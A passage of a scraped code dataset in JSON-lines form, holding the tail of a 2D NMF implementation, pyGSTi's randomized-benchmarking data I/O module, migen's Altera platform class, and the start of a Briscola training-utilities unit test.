np.sum(np.abs(X)**order)**(1.0/order)\n \n def __loss(self, V, W, H):\n VL, L = self.__compute_VL(V, W, H)\n Ckl = V * np.nan_to_num(np.log(VL)) - V + L\n W_reg = 0.0#self.__norm(self.__W_regularization(), 2)\n H_reg = self.H_penalty * self.__norm(H, (self.H_norm_order))\n return Ckl.sum() + W_reg + H_reg \n \n @timemeasure\n def fit(self, V):\n W, H = self.__init_WH(V)\n for i in range(0, self.n_iter):\n W = self.__update_W(V, W, H)\n W, H = self.normalize_WH(W, H)\n H = self.__update_H(V, W, H)\n W, H = self.normalize_WH(W, H)\n self.err[i] = self.__loss(V, W, H)\n print(i+1, self.err[i]) \n self.W, self.H = W, H\n return W, H\n\n def __shift(self, X, n, direction):\n if n == 0:\n return X\n M, N = X.shape\n Ret = np.zeros((M,N))\n if direction == \"right\":\n Ret[:,n::] = X[:,0:N-n]\n elif direction == \"left\":\n Ret[:,0:N-n] = X[:,n:N]\n elif direction == \"down\":\n Ret[n::,:] = X[0:M-n,:]\n elif direction == \"up\":\n #Ret[0:M-n,:] = X[n:M,:]\n Ret = np.r_[X[n:M,:],np.zeros((n,N))]\n return Ret\n\n def __convolution(self, W, H, factrize=False):\n V = np.zeros((self.n_row, self.n_col))\n for p in range(0, self.n_pitches):\n for t in range(0, self.n_frames):\n Wtmp = self.__shift(W[:,:,t], p, \"down\")\n Htmp = self.__shift(H[:,p,:], t, \"right\")\n V += np.dot(Wtmp, Htmp)\n return V\n\n def get_sources(self, W, H):\n S = np.zeros((self.n_row, self.n_col, self.n_basis))\n \n for p in range(0, self.n_pitches):\n for t in range(0, self.n_frames):\n Wtmp = self.__shift(W[:,:,t], p, \"down\")\n Htmp = self.__shift(H[:,p,:], t, \"right\")\n for k in range(0, self.n_basis):\n S[:,:,k] += np.outer(Wtmp[:,k], Htmp[k,:])\n return S \n \n def __compute_VL(self, V, W, H, eps=np.spacing(1)):\n L = self.__convolution(W, H)\n VL = np.nan_to_num(V/L)\n return VL, L\n\n def normalize_WH(self, W, H, return_2d=False):\n W2d = np.reshape(W, (self.n_row, self.n_basis*self.n_frames))\n H2d = np.reshape(H, (self.n_basis*self.n_pitches, self.n_col))\n \n for k in range(0, self.n_basis):\n fact = np.sum(W2d[:,k])\n W2d[:,k] /= fact\n H2d[k,:] *= fact\n \n if return_2d:\n return W2d, H2d\n else:\n W = np.reshape(W2d, (self.n_row, self.n_basis, self.n_frames))\n H = np.reshape(H2d, (self.n_basis, self.n_pitches, self.n_col))\n return W, H\n\n def reconstruct(self, W, H):\n return self.__convolution(W, H)\n ","repo_name":"Kurene/NMF2D","sub_path":"nmf2d.py","file_name":"nmf2d.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"38828690953","text":"import ast as _ast\nimport json as _json\nimport os as _os\nimport pickle as _pickle\nimport warnings as _warnings\n\nfrom pygsti.extras.rb import benchmarker as _benchmarker\nfrom pygsti.extras.rb import dataset as _dataset\n# todo : update\nfrom pygsti.extras.rb import sample as _sample\nfrom pygsti import io as _io\nfrom pygsti.circuits import circuit as _cir\nfrom pygsti.data import multidataset as _mds\n\n\n#def load_benchmarking_data(basedir):\n\ndef load_benchmarker(directory, load_datasets=True, verbosity=1):\n \"\"\"\n\n \"\"\"\n with open(directory + '/global.txt', 'r') as f:\n globaldict = _json.load(f)\n\n numpasses = globaldict['numpasses']\n speckeys = globaldict['speckeys']\n success_key = globaldict['success_key']\n success_outcome = globaldict['success_outcome']\n dscomparator = globaldict['dscomparator']\n\n if load_datasets:\n dskeys = [dskey.name for dskey in _os.scandir(directory + '/data') if dskey.is_dir()]\n multidsdict = {dskey: _mds.MultiDataSet()for dskey in dskeys}\n\n for dskey in dskeys:\n for passnum in range(numpasses):\n dsfn = directory + '/data/{}/ds{}.txt'.format(dskey, passnum)\n ds = _io.read_dataset(dsfn, collision_action='keepseparate', record_zero_counts=False,\n ignore_zero_count_lines=False, verbosity=verbosity)\n multidsdict[dskey].add_dataset(passnum, ds)\n else:\n multidsdict = None\n\n specs = {}\n for i, speckey in enumerate(speckeys):\n specs[speckey] = load_benchmarkspec(directory + '/specs/{}.txt'.format(i))\n\n summary_data = {'global': {}, 'pass': {}, 'aux': {}}\n predictionkeys = [pkey.name for pkey in _os.scandir(directory + '/predictions') if pkey.is_dir()]\n predicted_summary_data = {pkey: {} for pkey in predictionkeys}\n\n for i, spec in enumerate(specs.values()):\n\n summary_data['pass'][i] = {}\n summary_data['global'][i] = {}\n summary_data['aux'][i] = {}\n for pkey in predictionkeys:\n predicted_summary_data[pkey][i] = {}\n\n structure = spec.get_structure()\n\n for j, qubits in enumerate(structure):\n\n # Import the summary data for that spec and qubit subset\n with open(directory + '/summarydata/{}-{}.txt'.format(i, j), 'r') as f:\n sd = _json.load(f)\n summary_data['pass'][i][qubits] = {}\n for dtype, data in sd['pass'].items():\n summary_data['pass'][i][qubits][dtype] = {int(key): value for (key, value) in data.items()}\n summary_data['global'][i][qubits] = {}\n for dtype, data in sd['global'].items():\n summary_data['global'][i][qubits][dtype] = {int(key): value for (key, value) in data.items()}\n\n # Import the auxillary data\n with open(directory + '/aux/{}-{}.txt'.format(i, j), 'r') as f:\n aux = _json.load(f)\n summary_data['aux'][i][qubits] = {}\n for dtype, data in aux.items():\n summary_data['aux'][i][qubits][dtype] = {int(key): value for (key, value) in data.items()}\n\n # Import the predicted summary data for that spec and qubit subset\n for pkey in predictionkeys:\n with open(directory + '/predictions/{}/summarydata/{}-{}.txt'.format(pkey, i, j), 'r') as f:\n psd = _json.load(f)\n predicted_summary_data[pkey][i][qubits] = {}\n for dtype, data in psd.items():\n predicted_summary_data[pkey][i][qubits][dtype] = {\n int(key): value for (key, value) in data.items()}\n\n benchmarker = _benchmarker.Benchmarker(specs, ds=multidsdict, summary_data=summary_data,\n predicted_summary_data=predicted_summary_data,\n dstype='dict', success_outcome=success_outcome,\n success_key=success_key, dscomparator=dscomparator)\n\n return benchmarker\n\n\ndef write_benchmarker(benchmarker, outdir, overwrite=False, verbosity=0):\n\n try:\n _os.makedirs(outdir)\n if verbosity > 0:\n print(\" - Created `\" + outdir + \"` folder to store benchmarker in txt format.\")\n except:\n if overwrite:\n if verbosity > 0:\n print(\" - `\" + outdir + \"` folder already exists. Will write data into that folder.\")\n else:\n raise ValueError(\"Directory already exists! Set overwrite to True or change the directory name!\")\n\n globaldict = {}\n globaldict['speckeys'] = benchmarker._speckeys\n globaldict['numpasses'] = benchmarker.numpasses\n globaldict['success_outcome'] = benchmarker.success_outcome\n globaldict['success_key'] = benchmarker.success_key\n\n if benchmarker.dscomparator is not None:\n\n globaldict['dscomparator'] = {}\n globaldict['dscomparator']['pVal_pseudothreshold'] = benchmarker.dscomparator.pVal_pseudothreshold\n globaldict['dscomparator']['llr_pseudothreshold'] = benchmarker.dscomparator.llr_pseudothreshold\n globaldict['dscomparator']['pVal_pseudothreshold'] = benchmarker.dscomparator.pVal_pseudothreshold\n globaldict['dscomparator']['jsd_pseudothreshold'] = benchmarker.dscomparator.jsd_pseudothreshold\n globaldict['dscomparator']['aggregate_llr'] = benchmarker.dscomparator.aggregate_llr\n globaldict['dscomparator']['aggregate_llr_threshold'] = benchmarker.dscomparator.aggregate_llr_threshold\n globaldict['dscomparator']['aggregate_nsigma'] = benchmarker.dscomparator.aggregate_nsigma\n globaldict['dscomparator']['aggregate_nsigma_threshold'] = benchmarker.dscomparator.aggregate_nsigma_threshold\n globaldict['dscomparator']['aggregate_pVal'] = benchmarker.dscomparator.aggregate_pVal\n globaldict['dscomparator']['aggregate_pVal_threshold'] = benchmarker.dscomparator.aggregate_pVal_threshold\n globaldict['dscomparator']['inconsistent_datasets_detected'] = \\\n benchmarker.dscomparator.inconsistent_datasets_detected\n globaldict['dscomparator']['number_of_significant_sequences'] = int(\n benchmarker.dscomparator.number_of_significant_sequences)\n globaldict['dscomparator']['significance'] = benchmarker.dscomparator.significance\n\n else:\n globaldict['dscomparator'] = None\n\n # Write global details to file\n with open(outdir + '/global.txt', 'w') as f:\n _json.dump(globaldict, f, indent=4)\n\n _os.makedirs(outdir + '/specs')\n _os.makedirs(outdir + '/summarydata')\n _os.makedirs(outdir + '/aux')\n\n for pkey in benchmarker.predicted_summary_data.keys():\n _os.makedirs(outdir + '/predictions/{}/summarydata'.format(pkey))\n\n for i, spec in enumerate(benchmarker._specs):\n structure = spec.get_structure()\n write_benchmarkspec(spec, outdir + '/specs/{}.txt'.format(i), warning=0)\n\n for j, qubits in enumerate(structure):\n summarydict = {'pass': benchmarker.pass_summary_data[i][qubits],\n 'global': benchmarker.global_summary_data[i][qubits]\n }\n fname = outdir + '/summarydata/' + '{}-{}.txt'.format(i, j)\n with open(fname, 'w') as f:\n _json.dump(summarydict, f, indent=4)\n\n aux = benchmarker.aux[i][qubits]\n fname = outdir + '/aux/' + '{}-{}.txt'.format(i, j)\n with open(fname, 'w') as f:\n _json.dump(aux, f, indent=4)\n\n for pkey in benchmarker.predicted_summary_data.keys():\n summarydict = benchmarker.predicted_summary_data[pkey][i][qubits]\n fname = outdir + '/predictions/{}/summarydata/'.format(pkey) + '{}-{}.txt'.format(i, j)\n with open(fname, 'w') as f:\n _json.dump(summarydict, f, indent=4)\n\n for dskey in benchmarker.multids.keys():\n fdir = outdir + '/data/{}'.format(dskey)\n _os.makedirs(fdir)\n for dsind in benchmarker.multids[dskey].keys():\n fname = fdir + '/ds{}.txt'.format(dsind)\n _io.write_dataset(fname, benchmarker.multids[dskey][dsind], fixed_column_mode=False)\n\n\ndef create_benchmarker(dsfilenames, predictions=None, test_stability=True, auxtypes=None, verbosity=1):\n if predictions is None:\n predictions = dict()\n if auxtypes is None:\n auxtypes = []\n benchmarker = load_data_into_benchmarker(dsfilenames, verbosity=verbosity)\n if test_stability:\n if verbosity > 0:\n print(\" - Running stability analysis...\", end='')\n benchmarker.test_pass_stability(formatdata=True, verbosity=0)\n if verbosity > 0:\n print(\"complete.\")\n\n benchmarker.create_summary_data(predictions=predictions, auxtypes=auxtypes)\n\n return benchmarker\n\n# Todo : just make this and create_benchmarker a single function? This import has been superceded\n# by load_benchmarker\n\n\ndef load_data_into_benchmarker(dsfilenames=None, summarydatasets_filenames=None, summarydatasets_folder=None,\n predicted_summarydatasets_folders=None, verbosity=1):\n \"\"\"\n todo\n\n \"\"\"\n if predicted_summarydatasets_folders is None:\n predicted_summarydatasets_folders = dict()\n elif len(predicted_summarydatasets_folders) > 0:\n assert(summarydatasets_folder is not None)\n #if len(predicted_summarydatasets_folders) > 1:\n # raise NotImplementedError(\"This is not yet supported!\")\n\n if dsfilenames is not None:\n\n # If it is a filename, then we import the dataset from file.\n if isinstance(dsfilenames, str):\n dsfilenames = [dsfilenames, ]\n elif not isinstance(dsfilenames, list):\n raise ValueError(\"dsfilenames must be a str or a list of strings!\")\n\n mds = _mds.MultiDataSet()\n for dsfn_ind, dsfn in enumerate(dsfilenames):\n\n if dsfn[-4:] == '.txt':\n print(dsfn)\n mds.add_dataset(dsfn_ind, _io.read_dataset(dsfn,\n collision_action='keepseparate',\n record_zero_counts=False,\n ignore_zero_count_lines=False,\n verbosity=verbosity))\n\n elif dsfn[-4:] == '.pkl':\n\n if verbosity > 0:\n print(\" - Loading DataSet from pickle file...\", end='')\n with open(dsfn, 'rb') as f:\n mds.add_dataset(dsfn_ind, _pickle.load(f))\n if verbosity > 0:\n print(\"complete.\")\n\n else:\n raise ValueError(\"File must end in .pkl or .txt!\")\n\n # # If it isn't a string, we assume that `dsfilenames` is a DataSet.\n # else:\n\n # ds = dsfilenames\n\n if verbosity > 0: print(\" - Extracting metadata from the DataSet...\", end='')\n\n # To store the aux information about the RB experiments.\n all_spec_filenames = []\n # circuits_for_specfile = {}\n # outdslist = []\n\n # We go through the dataset and extract all the necessary auxillary information.\n for circ in mds[mds.keys()[0]].keys():\n\n # The spec filename or names for this circuits\n specfns_forcirc = mds.auxInfo[circ]['spec']\n # The RB length for this circuit\n # try:\n # l = mds.auxInfo[circ]['depth']\n # except:\n # l = mds.auxInfo[circ]['length']\n # The target bitstring for this circuit.\n # target = mds.auxInfo[circ]['target']\n\n # This can be a string (a single spec filename) or a list, so make always a list.\n if isinstance(specfns_forcirc, str):\n specfns_forcirc = [specfns_forcirc, ]\n\n for sfn_forcirc in specfns_forcirc:\n # If this is the first instance of seeing this filename then...\n if sfn_forcirc not in all_spec_filenames:\n # ... we store it in the list of all spec filenames to import later.\n all_spec_filenames.append(sfn_forcirc)\n # And it won't yet be a key in the circuits_for_specfile dict, so we add it.\n # circuits_for_specfile[sfn_forcirc] = {}\n\n # # If we've not yet had this length for that spec filename, we add that as a key.\n # if l not in circuits_for_specfile[sfn_forcirc].keys():\n # circuits_for_specfile[sfn_forcirc][l] = []\n\n # # We add the circuit and target output to the dict for the corresponding spec files.\n # circuits_for_specfile[sfn_forcirc][l].append((circ, target))\n\n # circ_specindices = []\n # for sfn_forcirc in specfns_forcirc:\n # circ_specindices.append(all_spec_filenames.index(sfn_forcirc))\n\n if verbosity > 0:\n print(\"complete.\")\n print(\" - Reading in the metadata from the extracted filenames...\", end='')\n\n # We put RB specs that we create via file import (and the circuits above) into this dict\n rbspecdict = {}\n\n # We look for spec files in the same directory as the datafiles, so we find what that is.\n # THIS REQUIRES ALL THE FILES TO BE IN THE SAME DIRECTORY\n directory = dsfilenames[0].split('/')\n directory = '/'.join(directory[: -1])\n if len(directory) > 0:\n directory += '/'\n\n for specfilename in all_spec_filenames:\n\n # Import the RB spec file.\n rbspec = load_benchmarkspec(directory + specfilename)\n # Add in the circuits that correspond to each spec, extracted from the dataset.\n # rbspec.add_circuits(circuits_for_specfile[specfilename])\n # Record the spec in a list, to be given to an RBAnalyzer object.\n rbspecdict[specfilename] = rbspec\n\n if verbosity > 0:\n print(\"complete.\")\n print(\" - Recording all of the data in a Benchmarker...\", end='')\n\n # Put everything into an RBAnalyzer object, which is a container for RB data, and return this.\n benchmarker = _benchmarker.Benchmarker(rbspecdict, ds=mds, summary_data=None)\n\n if verbosity > 0: print(\"complete.\")\n\n return benchmarker\n\n elif (summarydatasets_filenames is not None) or (summarydatasets_folder is not None):\n\n rbspecdict = {}\n\n # If a dict, its just the keys of the dict that are the rbspec file names.\n if summarydatasets_filenames is not None:\n\n specfiles = list(summarydatasets_filenames.keys())\n\n # If a folder, we look for files in that folder with the standard name format.\n elif summarydatasets_folder is not None:\n specfiles = []\n specfilefound = True\n i = 0\n while specfilefound:\n try:\n filename = summarydatasets_folder + \"/spec{}.txt\".format(i)\n with open(filename, 'r') as f:\n if verbosity > 0:\n print(filename + \" found\")\n specfiles.append(filename)\n i += 1\n except:\n specfilefound = False\n if verbosity > 0:\n print(filename + \" not found so terminating spec file search.\")\n\n for sfn_ind, specfilename in enumerate(specfiles):\n\n rbspec = load_benchmarkspec(specfilename)\n rbspecdict[sfn_ind] = rbspec\n\n summary_data = {}\n predicted_summary_data = {pkey: {} for pkey in predicted_summarydatasets_folders.keys()}\n\n for i, (specfilename, rbspec) in enumerate(zip(specfiles, rbspecdict.values())):\n\n structure = rbspec.get_structure()\n summary_data[i] = {}\n for pkey in predicted_summarydatasets_folders.keys():\n predicted_summary_data[pkey][i] = {}\n\n if summarydatasets_filenames is not None:\n sds_filenames = summarydatasets_filenames[specfilename]\n elif summarydatasets_folder is not None:\n sds_filenames = [summarydatasets_folder + '/{}-{}.txt'.format(i, j) for j in range(len(structure))]\n predsds_filenames_dict = {}\n for pkey, pfolder in predicted_summarydatasets_folders.items():\n predsds_filenames_dict[pkey] = [pfolder + '/{}-{}.txt'.format(i, j) for j in range(len(structure))]\n\n for sdsfn, qubits in zip(sds_filenames, structure):\n summary_data[i][qubits] = import_rb_summary_data(sdsfn, len(qubits), verbosity=verbosity)\n\n for pkey, predsds_filenames in predsds_filenames_dict.items():\n for sdsfn, qubits in zip(predsds_filenames, structure):\n predicted_summary_data[pkey][i][qubits] = import_rb_summary_data(\n sdsfn, len(qubits), verbosity=verbosity)\n\n benchmarker = _benchmarker.Benchmarker(rbspecdict, ds=None, summary_data=summary_data,\n predicted_summary_data=predicted_summary_data)\n\n return benchmarker\n\n else:\n raise ValueError(\"Either a filename for a DataSet or filenames for a set of RBSpecs \"\n + \"and RBSummaryDatasets must be provided!\")\n\n\ndef load_benchmarkspec(filename, circuitsfilename=None):\n \"\"\"\n todo\n\n \"\"\"\n #d = {}\n with open(filename) as f:\n d = _json.load(f)\n # for line in f:\n # if len(line) > 0 and line[0] != '#':\n # line = line.strip('\\n')\n # line = line.split(' ', 1)\n # try:\n # d[line[0]] = _ast.literal_eval(line[1])\n # except:\n # d[line[0]] = line[1]\n\n #assert(d.get('type', None) == 'rb'), \"This is for importing RB specs!\"\n\n try:\n rbtype = d['type']\n except:\n raise ValueError(\"Input file does not contain a line specifying the RB type!\")\n assert(isinstance(rbtype, str)), \"The RB type (specified as rbtype) must be a string!\"\n\n try:\n structure = d['structure']\n except:\n raise ValueError(\"Input file does not contain a line specifying the structure!\")\n if isinstance(structure, list):\n structure = tuple([tuple(qubits) for qubits in structure])\n assert(isinstance(structure, tuple)), \"The structure must be a tuple!\"\n\n try:\n sampler = d['sampler']\n except:\n raise ValueError(\"Input file does not contain a line specifying the circuit layer sampler!\")\n assert(isinstance(sampler, str)), \"The sampler name must be a string!\"\n\n samplerargs = d.get('samplerargs', None)\n depths = d.get('depths', None)\n numcircuits = d.get('numcircuits', None)\n subtype = d.get('subtype', None)\n\n if samplerargs is not None:\n assert(isinstance(samplerargs, dict)), \"The samplerargs must be a dict!\"\n\n if depths is not None:\n assert(isinstance(depths, list) or isinstance(depths, tuple)), \"The depths must be a list or tuple!\"\n\n if numcircuits is not None:\n assert(isinstance(numcircuits, list) or isinstance(numcircuits, int)), \"numcircuits must be an int or list!\"\n\n spec = _sample.BenchmarkSpec(rbtype, structure, sampler, samplerargs, depths=depths,\n numcircuits=numcircuits, subtype=subtype)\n\n return spec\n\n\ndef write_benchmarkspec(spec, filename, circuitsfilename=None, warning=1):\n \"\"\"\n todo\n\n \"\"\"\n if spec.circuits is not None:\n if circuitsfilename is not None:\n circuitlist = [circ for sublist in [spec.circuits[l] for l in spec.depths] for circ in sublist]\n _io.write_circuit_list(circuitsfilename, circuitlist)\n elif warning > 0:\n _warnings.warn(\"The circuits recorded in this RBSpec are not being written to file!\")\n\n # with open(filename, 'w') as f:\n # f.write('type rb\\n')\n # f.write('rbtype ' + rbspec._rbtype + '\\n')\n # f.write('structure ' + str(rbspec._structure) + '\\n')\n # f.write('sampler ' + rbspec._sampler + '\\n')\n # f.write('lengths ' + str(rbspec._lengths) + '\\n')\n # f.write('numcircuits ' + str(rbspec._numcircuits) + '\\n')\n # f.write('rbsubtype ' + str(rbspec._rbsubtype) + '\\n')\n # f.write('samplerargs ' + str(rbspec._samplerargs) + '\\n')\n\n specdict = spec.to_dict()\n del specdict['circuits'] # Don't write the circuits to this file.\n\n with open(filename, 'w') as f:\n _json.dump(specdict, f, indent=4)\n\n\ndef import_rb_summary_data(filename, numqubits, datatype='auto', verbosity=1):\n \"\"\"\n todo\n\n \"\"\"\n try:\n with open(filename, 'r') as f:\n if verbosity > 0: print(\"Importing \" + filename + \"...\", end='')\n except:\n raise ValueError(\"Date import failed! File does not exist or the format is incorrect.\")\n\n aux = []\n descriptor = ''\n # Work out the type of data we're importing\n with open(filename, 'r') as f:\n for line in f:\n\n if (len(line) == 0 or line[0] != '#'): break\n\n elif line.startswith(\"# \"):\n descriptor += line[2:]\n\n elif line.startswith(\"## \"):\n\n line = line.strip('\\n')\n line = line.split(' ')\n del line[0]\n\n if line[0:2] == ['rblength', 'success_probabilities']:\n\n auxind = 2\n if datatype == 'auto':\n datatype = 'success_probabilities'\n else:\n assert(datatype == 'success_probabilities'), \"The data format appears to be \" + \\\n \"success probabilities!\"\n\n elif line[0:3] == ['rblength', 'success_counts', 'total_counts']:\n\n auxind = 3\n if datatype == 'auto':\n datatype = 'success_counts'\n else:\n assert(datatype == 'success_counts'), \"The data format appears to be success counts!\"\n\n elif line[0: numqubits + 2] == ['rblength', ] + ['hd{}c'.format(i) for i in range(numqubits + 1)]:\n\n auxind = numqubits + 2\n if datatype == 'auto':\n datatype = 'hamming_distance_counts'\n else:\n assert(datatype == 'hamming_distance_counts'), \"The data format appears to be Hamming \" + \\\n \"distance counts!\"\n\n elif line[0: numqubits + 2] == ['rblength', ] + ['hd{}p'.format(i) for i in range(numqubits + 1)]:\n\n auxind = numqubits + 2\n if datatype == 'auto':\n datatype = 'hamming_distance_probabilities'\n else:\n assert(datatype == 'hamming_distance_probabilities'), \"The data format appears to be \" + \\\n \"Hamming distance probabilities!\"\n\n else:\n raise ValueError(\"Invalid file format!\")\n\n if len(line) > auxind:\n assert(line[auxind] == '#')\n if len(line) > auxind + 1:\n auxlabels = line[auxind + 1:]\n else:\n auxlabels = []\n\n break\n\n # Prepare an aux dict to hold any auxillary data\n aux = {key: {} for key in auxlabels}\n\n # Read in the data, using a different parser depending on the data type.\n if datatype == 'success_counts':\n\n success_counts = {}\n total_counts = {}\n finitecounts = True\n hamming_distance_counts = None\n\n with open(filename, 'r') as f:\n for line in f:\n if (len(line) > 0 and line[0] != '#'):\n\n line = line.strip('\\n')\n line = line.split(' ')\n l = int(line[0])\n\n if l not in success_counts:\n success_counts[l] = []\n total_counts[l] = []\n for key in auxlabels:\n aux[key][l] = []\n\n success_counts[l].append(float(line[1]))\n total_counts[l].append(float(line[2]))\n\n if len(aux) > 0:\n assert(line[3] == '#'), \"Auxillary data must be divided from the core data!\"\n for i, key in enumerate(auxlabels):\n if key != 'target' and key != 'circuit':\n aux[key][l].append(_ast.literal_eval(line[4 + i]))\n else:\n if key == 'target':\n aux[key][l].append(line[4 + i])\n if key == 'circuit':\n aux[key][l].append(_cir.Circuit(line[4 + i]))\n\n elif datatype == 'success_probabilities':\n\n success_counts = {}\n total_counts = None\n finitecounts = False\n hamming_distance_counts = None\n\n with open(filename, 'r') as f:\n for line in f:\n if (len(line) > 0 and line[0] != '#'):\n\n line = line.strip('\\n')\n line = line.split(' ')\n l = int(line[0])\n\n if l not in success_counts:\n success_counts[l] = []\n for key in auxlabels:\n aux[key][l] = []\n\n success_counts[l].append(float(line[1]))\n\n if len(aux) > 0:\n assert(line[2] == '#'), \"Auxillary data must be divided from the core data!\"\n for i, key in enumerate(auxlabels):\n if key != 'target' and key != 'circuit':\n aux[key][l].append(_ast.literal_eval(line[3 + i]))\n else:\n if key == 'target':\n aux[key][l].append(line[3 + i])\n if key == 'circuit':\n aux[key][l].append(_cir.Circuit(line[3 + i]))\n\n elif datatype == 'hamming_distance_counts' or datatype == 'hamming_distance_probabilities':\n\n hamming_distance_counts = {}\n success_counts = None\n total_counts = None\n\n if datatype == 'hamming_distance_counts': finitecounts = True\n if datatype == 'hamming_distance_probabilities': finitecounts = False\n\n with open(filename, 'r') as f:\n for line in f:\n if (len(line) > 0 and line[0] != '#'):\n\n line = line.strip('\\n')\n line = line.split(' ')\n l = int(line[0])\n\n if l not in hamming_distance_counts:\n hamming_distance_counts[l] = []\n for key in auxlabels:\n aux[key][l] = []\n\n hamming_distance_counts[l].append([float(line[1 + i]) for i in range(0, numqubits + 1)])\n\n if len(aux) > 0:\n assert(line[numqubits + 2] == '#'), \"Auxillary data must be divided from the core data!\"\n for i, key in enumerate(auxlabels):\n if key != 'target' and key != 'circuit':\n aux[key][l].append(_ast.literal_eval(line[numqubits + 3 + i]))\n else:\n if key == 'target':\n aux[key][l].append(line[numqubits + 3 + i])\n if key == 'circuit':\n aux[key][l].append(line[numqubits + 3 + i])\n #aux[key][l].append(_cir.Circuit(line[numqubits + 3 + i]))\n else:\n raise ValueError(\"The data format couldn't be extracted from the file!\")\n\n rbdataset = _dataset.RBSummaryDataset(numqubits, success_counts=success_counts, total_counts=total_counts,\n hamming_distance_counts=hamming_distance_counts, aux=aux,\n finitecounts=finitecounts, descriptor=descriptor)\n\n if verbosity > 0:\n print('complete')\n\n return rbdataset\n\n\ndef write_rb_summary_data_to_file(ds, filename):\n \"\"\"\n todo\n\n \"\"\"\n numqubits = ds.num_qubits\n with open(filename, 'w') as f:\n\n descriptor_string = ds.descriptor.split(\"\\n\")\n\n for s in descriptor_string:\n if len(s) > 0:\n f.write(\"# \" + s + \"\\n\")\n\n if ds.datatype == 'success_counts':\n if ds.finitecounts:\n topline = '## rblength success_counts total_counts'\n else:\n topline = '## rblength success_probabilities'\n\n elif ds.datatype == 'hamming_distance_counts':\n if ds.finitecounts:\n topline = '## rblength' + ''.join([' hd{}c'.format(i) for i in range(0, numqubits + 1)])\n else:\n topline = '## rblength' + ''.join([' hd{}p'.format(i) for i in range(0, numqubits + 1)])\n\n auxlabels = list(ds.aux.keys())\n if len(auxlabels) > 0:\n topline += ' #'\n for key in auxlabels: topline += ' ' + key\n\n f.write(topline + '\\n')\n\n for l, counts in ds.counts.items():\n\n for i, c in enumerate(counts):\n\n if ds.datatype == 'success_counts':\n if ds.finitecounts:\n dataline = str(l) + ' ' + str(c) + ' ' + str(ds._total_counts[l][i])\n else:\n dataline = str(l) + ' ' + str(c)\n elif ds.datatype == 'hamming_distance_counts':\n dataline = str(l) + ''.join([' ' + str(c[i]) for i in range(0, numqubits + 1)])\n\n if len(auxlabels) > 0:\n dataline += ' #' + ''.join([' ' + str(ds.aux[key][l][i]) for key in auxlabels])\n\n f.write(dataline + '\\n')\n\n return\n\n\n# # todo update this.\n# def import_rb_summary_data(filenames, numqubits, type='auto', verbosity=1):\n# \"\"\"\n# todo : redo\n# Reads in one or more text files of summary RB data into a RBSummaryDataset object. This format\n# is appropriate for using the RB analysis functions. The datafile(s) should have one of the\n# following two formats:\n\n# Format 1 (`is_counts_data` is True):\n\n# # The number of qubits\n# The number of qubits (this line is optional if `num_qubits` is specified)\n# # RB length // Success counts // Total counts // Circuit depth // Circuit two-qubit gate count\n# Between 3 and 5 columns of data (the last two columns are expected only if `contains_circuit_data` is True).\n\n# Format 2 (`is_counts_data` is False):\n\n# # The number of qubits\n# The number of qubits (this line is optional if `num_qubits` is specified)\n# # RB length // Survival probabilities // Circuit depth // Circuit two-qubit gate count\n# Between 2 and 4 columns of data (the last two columns are expected only if `contains_circuit_data` is True).\n\n# Parameters\n# ----------\n# filenames : str or list.\n# The filename, or a list of filenams, where the data is stored. The data from all files is read\n# into a *single* dataset, so normally it should all be data for a single RB experiment.\n\n# is_counts_data : bool, optional\n# Whether the data to be read contains success counts data (True) or survival probability data (False).\n\n# contains_circuit_data : bool, optional.\n# Whether the data counts summary circuit data.\n\n# finitesampling : bool, optional\n# Records in the RBSummaryDataset whether the survival probability for each circuit was obtained\n# from finite sampling of the outcome probabilities. This is there to, by default, warn the user\n# that any finite sampling cannot be taken into account if the input is not counts data (when\n# they run any analysis on the data). But it is useful to be able to set this to False for simulated\n# data obtained from perfect outcome sampling.\n\n# num_qubits : int, optional.\n# The number of qubits the data is for. Must be specified if this isn't in the input file.\n\n# total_counts : int, optional\n# If the data is success probability data, the total counts can optional be input here.\n\n# verbosity : int, optional\n# The amount of print-to-screen.\n\n# Returns\n# -------\n# None\n# \"\"\"\n\n\n# # todo : update this.\n# def write_rb_summary_data_to_file(RBSdataset, filename):\n# \"\"\"\n# Writes an RBSSummaryDataset to file, in the format that can be read back in by\n# import_rb_summary_data().\n\n# Parameters\n# ----------\n# RBSdataset : RBSummaryDataset\n# The data to write to file.\n\n# filename : str\n# The filename where the dataset should be written.\n\n# Returns\n# -------\n# None\n# \"\"\"\n","repo_name":"pyGSTio/pyGSTi","sub_path":"pygsti/extras/rb/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":33215,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"62"} +{"seq_id":"28108745054","text":"from migen.build.generic_platform import GenericPlatform\nfrom migen.build.altera import common, quartus\n\n\nclass AlteraPlatform(GenericPlatform):\n bitstream_ext = \".sof\"\n create_rbf = True\n\n def __init__(self, *args, toolchain=\"quartus\", **kwargs):\n GenericPlatform.__init__(self, *args, **kwargs)\n if toolchain == \"quartus\":\n self.toolchain = quartus.AlteraQuartusToolchain()\n else:\n raise ValueError(\"Unknown toolchain\")\n\n def get_verilog(self, *args, special_overrides=dict(), **kwargs):\n so = dict(common.altera_special_overrides)\n so.update(special_overrides)\n return GenericPlatform.get_verilog(self, *args, special_overrides=so,\n **kwargs)\n\n def build(self, *args, **kwargs):\n return self.toolchain.build(self, *args, **kwargs)\n\n def add_period_constraint(self, clk, period):\n if hasattr(clk, \"p\"):\n clk = clk.p\n self.toolchain.add_period_constraint(self, clk, period)\n","repo_name":"m-labs/migen","sub_path":"migen/build/altera/platform.py","file_name":"platform.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":1114,"dataset":"github-code","pt":"62"} +{"seq_id":"9596509283","text":"import unittest\n\nfrom src.agents.RandomAgent import RandomAgent\nfrom src.envs.two_player_briscola.BriscolaConstants import Constants\nfrom src.envs.two_player_briscola.TwoPlayerBriscola import TwoPlayerBriscola\nfrom src.utils.training_utils import play_all_moves_of_player, play_all_moves_of_players\nfrom src.vectorizers.VectorizedEnv import VectorizedEnv\n\n\nclass TestTrainUtils(unittest.TestCase):\n def test_play_all_moves_of_player(self):\n vec_env = VectorizedEnv(lambda: TwoPlayerBriscola(), 128)\n n_actions = vec_env.single_action_space().n\n player_policy = RandomAgent(n_actions)\n vec_env.reset()\n for _ in range(Constants.deck_cards // (2 * Constants.n_agents) + 1):\n play_all_moves_of_player(vec_env.get_envs(), player_policy, \"player_0\")\n [self.assertEqual(agent, \"player_1\") for agent in 